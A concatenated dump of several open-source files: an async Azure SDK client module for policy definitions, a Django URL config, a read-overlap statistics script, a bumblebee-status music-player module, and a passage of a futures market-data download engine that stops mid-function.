from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._policy_definitions_operations import build_create_or_update_at_management_group_request, build_create_or_update_request, build_delete_at_management_group_request, build_delete_request, build_get_at_management_group_request, build_get_built_in_request, build_get_request, build_list_built_in_request, build_list_by_management_group_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PolicyDefinitionsOperations:
"""PolicyDefinitionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.policy.v2021_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update(
self,
policy_definition_name: str,
parameters: "_models.PolicyDefinition",
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Creates or updates a policy definition in a subscription.
This operation creates or updates a policy definition in the given subscription with the given
name.
:param policy_definition_name: The name of the policy definition to create.
:type policy_definition_name: str
:param parameters: The policy definition properties.
:type parameters: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'PolicyDefinition')
request = build_create_or_update_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
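    # Editor's sketch: a minimal payload for create_or_update (illustrative
    # only; field names follow this package's PolicyDefinition model, and the
    # definition name and rule below are hypothetical):
    #   definition = _models.PolicyDefinition(
    #       display_name="Deny everything (demo)",
    #       mode="All",
    #       policy_rule={"if": {"field": "type", "like": "*"},
    #                    "then": {"effect": "deny"}},
    #   )
    #   created = await operations.create_or_update("deny-everything-demo", definition)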
@distributed_trace_async
async def delete(
self,
policy_definition_name: str,
**kwargs: Any
) -> None:
"""Deletes a policy definition in a subscription.
This operation deletes the policy definition in the given subscription with the given name.
:param policy_definition_name: The name of the policy definition to delete.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get(
self,
policy_definition_name: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieves a policy definition in a subscription.
This operation retrieves the policy definition in the given subscription with the given name.
:param policy_definition_name: The name of the policy definition to get.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get_built_in(
self,
policy_definition_name: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieves a built-in policy definition.
This operation retrieves the built-in policy definition with the given name.
:param policy_definition_name: The name of the built-in policy definition to get.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_built_in_request(
policy_definition_name=policy_definition_name,
template_url=self.get_built_in.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_built_in.metadata = {'url': '/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def create_or_update_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
parameters: "_models.PolicyDefinition",
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Creates or updates a policy definition in a management group.
This operation creates or updates a policy definition in the given management group with the
given name.
:param policy_definition_name: The name of the policy definition to create.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:param parameters: The policy definition properties.
:type parameters: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'PolicyDefinition')
request = build_create_or_update_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def delete_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
**kwargs: Any
) -> None:
"""Deletes a policy definition in a management group.
This operation deletes the policy definition in the given management group with the given name.
:param policy_definition_name: The name of the policy definition to delete.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
template_url=self.delete_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieve a policy definition in a management group.
This operation retrieves the policy definition in the given management group with the given
name.
:param policy_definition_name: The name of the policy definition to get.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
template_url=self.get_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace
def list(
self,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieves policy definitions in a subscription.
This operation retrieves a list of all the policy definitions in a given subscription that
        match the optional given $filter. Valid values for $filter are: 'atExactScope()', 'policyType
        eq '{value}'' or 'category eq '{value}''. If $filter is not provided, the unfiltered list
        includes all policy definitions associated with the subscription, including those that apply
        directly or from management groups that contain the given subscription. If
        $filter=atExactScope() is provided, the returned list only includes all policy definitions
        that exist at the given subscription. If $filter='policyType eq '{value}'' is provided, the
        returned list only includes all policy definitions whose type matches the {value}. Possible
        policyType values are NotSpecified, BuiltIn, Custom, and Static. If $filter='category eq
        '{value}'' is provided, the returned list only includes all policy definitions whose
        category matches the {value}.
        :param filter: The filter to apply on the operation. Valid values for $filter are:
         'atExactScope()', 'policyType eq '{value}'' or 'category eq '{value}''. If $filter is not
         provided, no filtering is performed. If $filter=atExactScope() is provided, the returned
         list only includes all policy definitions that exist at the given scope. If
         $filter='policyType eq '{value}'' is provided, the returned list only includes all policy
         definitions whose type matches the {value}. Possible policyType values are NotSpecified,
         BuiltIn, Custom, and Static. If $filter='category eq '{value}'' is provided, the returned
         list only includes all policy definitions whose category matches the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
@distributed_trace
def list_built_in(
self,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieve built-in policy definitions.
This operation retrieves a list of all the built-in policy definitions that match the optional
given $filter. If $filter='policyType -eq {value}' is provided, the returned list only includes
all built-in policy definitions whose type match the {value}. Possible policyType values are
NotSpecified, BuiltIn, Custom, and Static. If $filter='category -eq {value}' is provided, the
returned list only includes all built-in policy definitions whose category match the {value}.
:param filter: The filter to apply on the operation. Valid values for $filter are:
'atExactScope()', 'policyType -eq {value}' or 'category eq '{value}''. If $filter is not
provided, no filtering is performed. If $filter=atExactScope() is provided, the returned list
only includes all policy definitions that at the given scope. If $filter='policyType -eq
{value}' is provided, the returned list only includes all policy definitions whose type match
the {value}. Possible policyType values are NotSpecified, BuiltIn, Custom, and Static. If
$filter='category -eq {value}' is provided, the returned list only includes all policy
definitions whose category match the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_built_in_request(
filter=filter,
top=top,
template_url=self.list_built_in.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_built_in_request(
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_built_in.metadata = {'url': '/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
@distributed_trace
def list_by_management_group(
self,
management_group_id: str,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieve policy definitions in a management group.
This operation retrieves a list of all the policy definitions in a given management group that
match the optional given $filter. Valid values for $filter are: 'atExactScope()', 'policyType
-eq {value}' or 'category eq '{value}''. If $filter is not provided, the unfiltered list
includes all policy definitions associated with the management group, including those that
apply directly or from management groups that contain the given management group. If
$filter=atExactScope() is provided, the returned list only includes all policy definitions that
at the given management group. If $filter='policyType -eq {value}' is provided, the returned
list only includes all policy definitions whose type match the {value}. Possible policyType
values are NotSpecified, BuiltIn, Custom, and Static. If $filter='category -eq {value}' is
provided, the returned list only includes all policy definitions whose category match the
{value}.
:param management_group_id: The ID of the management group.
:type management_group_id: str
:param filter: The filter to apply on the operation. Valid values for $filter are:
'atExactScope()', 'policyType -eq {value}' or 'category eq '{value}''. If $filter is not
provided, no filtering is performed. If $filter=atExactScope() is provided, the returned list
only includes all policy definitions that at the given scope. If $filter='policyType -eq
{value}' is provided, the returned list only includes all policy definitions whose type match
the {value}. Possible policyType values are NotSpecified, BuiltIn, Custom, and Static. If
$filter='category -eq {value}' is provided, the returned list only includes all policy
definitions whose category match the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_management_group_request(
management_group_id=management_group_id,
filter=filter,
top=top,
template_url=self.list_by_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_management_group_request(
management_group_id=management_group_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
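# --------------------------------------------------------------------------
# Editor's usage sketch (not part of the generated module). It assumes the
# azure-identity package and the async PolicyClient exposed by this SDK
# (azure.mgmt.resource.policy.aio); verify both names against your installed
# versions before relying on it.
# --------------------------------------------------------------------------
if __name__ == "__main__":  # pragma: no cover - illustrative only
    import asyncio
    from azure.identity.aio import DefaultAzureCredential  # assumed installed
    from azure.mgmt.resource.policy.aio import PolicyClient

    async def _demo() -> None:
        credential = DefaultAzureCredential()
        client = PolicyClient(credential, subscription_id="<subscription-id>")
        # Page through the built-in policy definitions via this operation group.
        async for definition in client.policy_definitions.list_built_in():
            print(definition.name)
        await client.close()
        await credential.close()

    asyncio.run(_demo())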
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/policy/v2021_06_01/aio/operations/_policy_definitions_operations.py
|
Python
|
mit
| 32,611
|
from django.conf.urls import url, include
from diaries.api import *
urlpatterns = [
url(r'^diary/', include("english_diary.urls.api.diary", namespace="diary")),
url(r'^naver/', include("english_diary.urls.api.naver", namespace="naver")),
url(r'^user/', include("english_diary.urls.api.user", namespace="user")),
]
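# Editor's note: with these namespaces, a view defined in, say,
# english_diary.urls.api.diary under the (hypothetical) URL name "list"
# would be reversed as reverse("diary:list").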
|
jupiny/EnglishDiary
|
english_diary/english_diary/urls/api/__init__.py
|
Python
|
mit
| 329
|
import sys

import numpy

# Collect overlap lengths for assembled reads whose average quality is >= 25.
# The input (sys.argv[1]) is a tab-separated file with 12 fields per record:
# field 4 is the sequence id, field 6 the sequence length, the fourth-from-last
# field the average quality, and the third-from-last the overlap length.
overlaps = []
for line in open(sys.argv[1]):
    lexemes = line.strip().split('\t')
    if len(lexemes) == 12:
        seq_id = lexemes[3]
        seq_len = int(lexemes[5])
        avg_Q = int(lexemes[-4])
        overlap = int(lexemes[-3])
        if avg_Q >= 25:
            overlaps.append(overlap)

print("The shortest overlap is: %s" % min(overlaps))
print("The longest overlap is: %s" % max(overlaps))
print("The average overlap is: %s" % numpy.mean(overlaps))
print("The standard deviation of overlap is: %s" % numpy.std(overlaps))
|
chnops/code
|
rdp_assem_stat_parser.py
|
Python
|
mit
| 804
|
# pylint: disable=C0111,R0903
# -*- coding: utf-8 -*-
"""Displays information about the current song in mocp. Left click toggles play/pause. Right click toggles shuffle.
Requires the following executable:
* mocp
Parameters:
* mocp.format: Format string for the song information. Replace string sequences with the actual information:
* %state State
* %file File
* %title Title, includes track, artist, song title and album
* %artist Artist
* %song SongTitle
* %album Album
* %tt TotalTime
* %tl TimeLeft
* %ts TotalSec
* %ct CurrentTime
* %cs CurrentSec
* %b Bitrate
* %r Sample rate
contributed by `chrugi <https://github.com/chrugi>`_ - many thanks!
"""
import core.module
import core.widget
import core.input
import util.cli
class Module(core.module.Module):
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.description))
core.input.register(self, button=core.input.LEFT_MOUSE, cmd="mocp -G")
core.input.register(self, button=core.input.RIGHT_MOUSE, cmd="mocp -t shuffle")
self.__format = self.parameter("format", "%state %artist - %song | %ct/%tt")
self.__running = False
def description(self, widget):
        return self.__info if self.__running else "Music On Console Player"
def update(self):
self.__load_song()
def __load_song(self):
try:
self.__info = util.cli.execute("mocp -Q '{}'".format(self.__format)).strip()
self.__running = True
except RuntimeError:
self.__running = False
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
tobi-wan-kenobi/bumblebee-status
|
bumblebee_status/modules/contrib/mocp.py
|
Python
|
mit
| 1,800
|
# encoding: UTF-8
"""
This module mainly contains:
1. An engine that downloads historical market data from Datayes
2. Functions for loading historical data exported from MultiCharts into MongoDB
"""
import os,sys
from datetime import datetime, timedelta
import pymongo
from time import time
from multiprocessing.pool import ThreadPool
from ctaBase import *
from vtConstant import *
from vtFunction import loadMongoSetting
from datayesClient import DatayesClient
# Mapping between the exchange codes used by vn.trader and by Datayes
VT_TO_DATAYES_EXCHANGE = {}
VT_TO_DATAYES_EXCHANGE[EXCHANGE_CFFEX] = 'CCFX'     # CFFEX (China Financial Futures Exchange)
VT_TO_DATAYES_EXCHANGE[EXCHANGE_SHFE] = 'XSGE'      # SHFE (Shanghai Futures Exchange)
VT_TO_DATAYES_EXCHANGE[EXCHANGE_CZCE] = 'XZCE'      # CZCE (Zhengzhou Commodity Exchange)
VT_TO_DATAYES_EXCHANGE[EXCHANGE_DCE] = 'XDCE'       # DCE (Dalian Commodity Exchange)
DATAYES_TO_VT_EXCHANGE = {v:k for k,v in VT_TO_DATAYES_EXCHANGE.items()}
########################################################################
class HistoryDataEngine(object):
"""CTA模块用的历史数据引擎"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
host, port, logging = loadMongoSetting()
self.dbClient = pymongo.MongoClient(host, port)
self.datayesClient = DatayesClient()
#----------------------------------------------------------------------
def lastTradeDate(self):
"""获取最近交易日(只考虑工作日,无法检查国内假期)"""
today = datetime.now()
oneday = timedelta(1)
if today.weekday() == 5:
today = today - oneday
elif today.weekday() == 6:
today = today - oneday*2
return today.strftime('%Y%m%d')
#----------------------------------------------------------------------
def readFuturesProductSymbol(self):
"""查询所有期货产品代码"""
cx = self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].find()
        return set([d['productSymbol'] for d in cx]) # a set, because product codes repeat across contracts
#----------------------------------------------------------------------
def readFuturesSymbol(self):
"""查询所有期货合约代码"""
cx = self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].find()
        return [d['symbol'] for d in cx] # a plain list
#----------------------------------------------------------------------
def downloadFuturesSymbol(self, tradeDate=''):
"""下载所有期货的代码"""
if not tradeDate:
tradeDate = self.lastTradeDate()
self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].ensure_index([('symbol', pymongo.ASCENDING)],
unique=True)
path = 'api/market/getMktMFutd.json'
params = {}
params['tradeDate'] = tradeDate
data = self.datayesClient.downloadData(path, params)
if data:
for d in data:
symbolDict = {}
symbolDict['symbol'] = d['ticker']
symbolDict['productSymbol'] = d['contractObject']
flt = {'symbol': d['ticker']}
self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].update_one(flt, {'$set':symbolDict},
upsert=True)
            print u'Futures contract symbols downloaded'
else:
            print u'Failed to download futures contract symbols'
#----------------------------------------------------------------------
def downloadFuturesDailyBar(self, symbol):
"""
        Download daily bars for a futures contract. symbol is the contract code;
        if its last four characters are 0000 (e.g. IF0000), the continuous main
        contract is downloaded instead.
"""
        print u'Start downloading daily bars for %s' %symbol
        # Find the latest bar already stored in the database
cl = self.dbClient[DAILY_DB_NAME][symbol]
cx = cl.find(sort=[('datetime', pymongo.DESCENDING)])
if cx.count():
last = cx[0]
else:
last = ''
        # Continuous main contract
if '0000' in symbol:
path = 'api/market/getMktMFutd.json'
params = {}
params['contractObject'] = symbol.replace('0000', '')
params['mainCon'] = 1
if last:
params['startDate'] = last['date']
        # Specific tradable contract
else:
path = 'api/market/getMktFutd.json'
params = {}
params['ticker'] = symbol
if last:
params['startDate'] = last['date']
        # Start downloading the data
data = self.datayesClient.downloadData(path, params)
if data:
            # Create a unique index on datetime
self.dbClient[DAILY_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = d.get('tradeDate', '').replace('-', '')
bar.time = ''
bar.datetime = datetime.strptime(bar.date, '%Y%m%d')
bar.volume = d.get('turnoverVol', 0)
bar.openInterest = d.get('openInt', 0)
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[DAILY_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
            print u'%s downloaded' %symbol
else:
            print u'Contract %s not found' %symbol
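    # Usage sketch (assumes valid Datayes credentials in the client settings):
    #   engine = HistoryDataEngine()
    #   engine.downloadFuturesDailyBar('IF0000')   # continuous main contract
    #   engine.downloadFuturesDailyBar('rb1705')   # a hypothetical specific contract month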
#----------------------------------------------------------------------
def downloadAllFuturesDailyBar(self):
"""下载所有期货的主力合约日行情"""
start = time()
        print u'Start downloading daily bars for all main futures contracts'
productSymbolSet = self.readFuturesProductSymbol()
        print u'Symbol list loaded, product symbols: %s' %productSymbolSet
        # A thread pool was also tested here, but the download function does a
        # lot of data-format conversion (CPU-bound), so multithreading brought
        # no noticeable speedup.
#p = ThreadPool(10)
#p.map(self.downloadFuturesDailyBar, productSymbolSet)
#p.close()
#p.join()
for productSymbol in productSymbolSet:
self.downloadFuturesDailyBar(productSymbol+'0000')
        print u'Daily bars for all main futures contracts downloaded, took %s seconds' %(time()-start)
#----------------------------------------------------------------------
def downloadFuturesIntradayBar(self, symbol):
"""下载期货的日内分钟行情"""
        print u'Start downloading intraday minute bars for %s' %symbol
        # Intraday minute bars are only available for specific contracts
path = 'api/market/getFutureBarRTIntraDay.json'
params = {}
params['instrumentID'] = symbol
params['unit'] = 1
data = self.datayesClient.downloadData(path, params)
if data:
today = datetime.now().strftime('%Y%m%d')
            # Create a unique index on datetime
self.dbClient[MINUTE_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
